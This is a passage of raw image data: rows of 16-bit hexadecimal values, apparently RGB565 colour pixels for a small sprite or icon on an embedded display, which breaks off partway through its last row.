0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 